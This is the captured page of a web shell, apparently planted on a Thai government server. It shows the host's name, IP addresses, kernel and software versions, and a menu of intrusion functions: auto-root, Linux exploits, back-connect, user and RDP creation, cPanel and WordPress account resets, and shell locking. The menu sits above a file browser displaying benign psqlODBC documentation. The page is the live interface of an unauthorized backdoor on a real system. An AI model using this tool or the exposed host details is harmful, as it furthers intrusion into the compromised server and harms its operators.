Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
postgresql-odbc-08.04.0200 /
[ HOME SHELL ]
Name
Size
Permission
Action
config-opt.html
6
KB
-rw-r--r--
config.html
13.76
KB
-rw-r--r--
faq.html
28.33
KB
-rw-r--r--
howto-accesslo.html
2.35
KB
-rw-r--r--
howto-accessvba.html
6.24
KB
-rw-r--r--
howto-bo.html
1.67
KB
-rw-r--r--
howto-ch.html
4.04
KB
-rw-r--r--
howto-csharp.html
4.95
KB
-rw-r--r--
howto-vb.html
3.42
KB
-rw-r--r--
howto-vblo.html
8.52
KB
-rw-r--r--
index.html
4.35
KB
-rw-r--r--
license.txt
25.14
KB
-rw-r--r--
readme.txt
1.35
KB
-rw-r--r--
release.html
43.97
KB
-rw-r--r--
unix-compilation.html
2.35
KB
-rw-r--r--
win32-compilation.html
3.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : howto-accesslo.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>psqlODBC HOWTO - Access Large Objects</title> </HEAD> <body bgcolor="#ffffff" text="#000000" link="#ff0000" vlink="#a00000" alink="#0000ff"> <h1>psqlODBC HOWTO - Access Large Objects</h1> <p> <i> Author: Unknown<br> Release Date: Unknown<br> Description: Using large objects in Microsoft Access (notes from the original psqlODBC docs) </i> <br><br> <h2>Using Large Objects for handling LongVarBinary (OLE Objects in Access)</h2> <p>Large objects are mapped to LONGVARBINARY in the driver to allow storing things like OLE objects in Microsoft Access. Multiple SQLPutData and SQLGetData calls are usually used to send and retrieve these objects. The driver creates a new large object and simply inserts its 'identifier' into the respective table. However, since PostgreSQL uses an 'Oid' to identify a Large Object, it is necessary to create a new PostgreSQL type to be able to discriminate between an ordinary Oid and a Large Object Oid. Until this new type becomes an official part of PostgreSQL, it must be added into the desired database and looked up for each connection. The type used in the driver is simply called "lo" and here is the command used to create it:</p> <blockquote> <pre> create type lo ( internallength=4, externallength=10, input=int4in, output=int4out, default='', passedbyvalue ); </pre> </blockquote> <p>Once this is done, simply use the new 'lo' type to define columns in that database. Note that this must be done for each database you want to use large objects in with the driver. When the driver sees an 'lo' type, it will handle it as LONGVARBINARY.</p> <p>Another important note is that this new type is lacking in functionality. It will not cleanup after itself on updates and deletes, thus leaving orphans around and using up extra disk space. And currently, PostgreSQL does not support the vacuuming of large objects. Hopefully in the future, a real large object data type will be available.</p> <p>But for now, it sure is fun to stick a Word document, Visio document, or avi of a dancing baby into a database column, even if you will fill up your server's hard disk after a while!</p> </body> </html>
Close